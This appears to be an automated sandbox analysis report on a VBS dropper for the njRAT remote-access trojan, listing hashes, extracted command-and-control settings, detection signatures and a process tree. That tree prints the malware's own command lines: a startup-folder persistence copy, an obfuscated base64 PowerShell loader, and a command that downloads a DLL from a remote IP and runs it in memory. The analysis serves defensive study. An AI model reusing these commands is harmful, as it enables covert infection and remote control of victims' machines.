Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
21-12-2021 15:00
Static task
static1
Behavioral task
behavioral1
Sample
bc1df94edc704d4be73eb5e91c2331be.vbs
Resource
win7-en-20211208
General
-
Target
bc1df94edc704d4be73eb5e91c2331be.vbs
-
Size
151KB
-
MD5
bc1df94edc704d4be73eb5e91c2331be
-
SHA1
18d6f490b6a99d8a17df13c0bd037fd56e215d8c
-
SHA256
946bd0343beb66996e777f0f7b83143053aa574ddaae249fae927795891a0363
-
SHA512
1c6af4ec257a33e365dc43b278fbbbd4e127cfe1b89974c871425b8165b30c374707eac15deaeb7b4bb869159d9d4271951dc7ce28cf062f9c147278018b1d61
Malware Config
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
njrat
0.7NC
NYAN CAT
revg.duckdns.org:57831
ebef4abe57d24e8
-
reg_key
ebef4abe57d24e8
-
splitter
@!#&^%$
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 2860 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ FAH.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ FAH.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2860 set thread context of 3496 2860 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2420 powershell.exe 2420 powershell.exe 2420 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe Token: 33 3496 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3496 RegSvcs.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exedescription pid process target process PID 2736 wrote to memory of 2836 2736 WScript.exe cmd.exe PID 2736 wrote to memory of 2836 2736 WScript.exe cmd.exe PID 2836 wrote to memory of 3628 2836 cmd.exe PING.EXE PID 2836 wrote to memory of 3628 2836 cmd.exe PING.EXE PID 2836 wrote to memory of 2556 2836 cmd.exe powershell.exe PID 2836 wrote to memory of 2556 2836 cmd.exe powershell.exe PID 2736 wrote to memory of 2420 2736 WScript.exe powershell.exe PID 2736 wrote to memory of 2420 2736 WScript.exe powershell.exe PID 2420 wrote to memory of 2860 2420 powershell.exe powershell.exe PID 2420 wrote to memory of 2860 2420 powershell.exe powershell.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe PID 2860 wrote to memory of 3496 2860 powershell.exe RegSvcs.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bc1df94edc704d4be73eb5e91c2331be.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\bc1df94edc704d4be73eb5e91c2331be.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ FAH.vbs')2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:3628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\bc1df94edc704d4be73eb5e91c2331be.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ FAH.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3496
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
8081d7d0beea2c77923793b863bd136a
SHA1c01ff189d955f9d6923a79a7611fa9eb4233122b
SHA256ad122ea0c66ddd5529db00bbeebffab42f8576b2a2e1b80ee678bf8df0fe4db7
SHA5125375caac975a7469f08b7f53ec7c96a02089f7607617ab81ad51a38e3ce61e12b793b3950e075cd32193e540babe36d8d31c656d2acba982a6188663e9f05641
-
MD5
b2e3474d824e227a0a9fcc275b3e34df
SHA1ba2aa1550f80d92786b2898593bd9abbbcd63298
SHA256cf21ab7de89e027a7c74e8342d0f011a6f63bafe48bf43c6f9d9e274a9c230a3
SHA5124a1f62f64bc2c085ce06c2d867296d40207ace73c640c56db68d8e415d89e7968c3a404274901836f430a2e0c0ad91ec7b9bc96c52ca4b0e3bac3c0581322d0b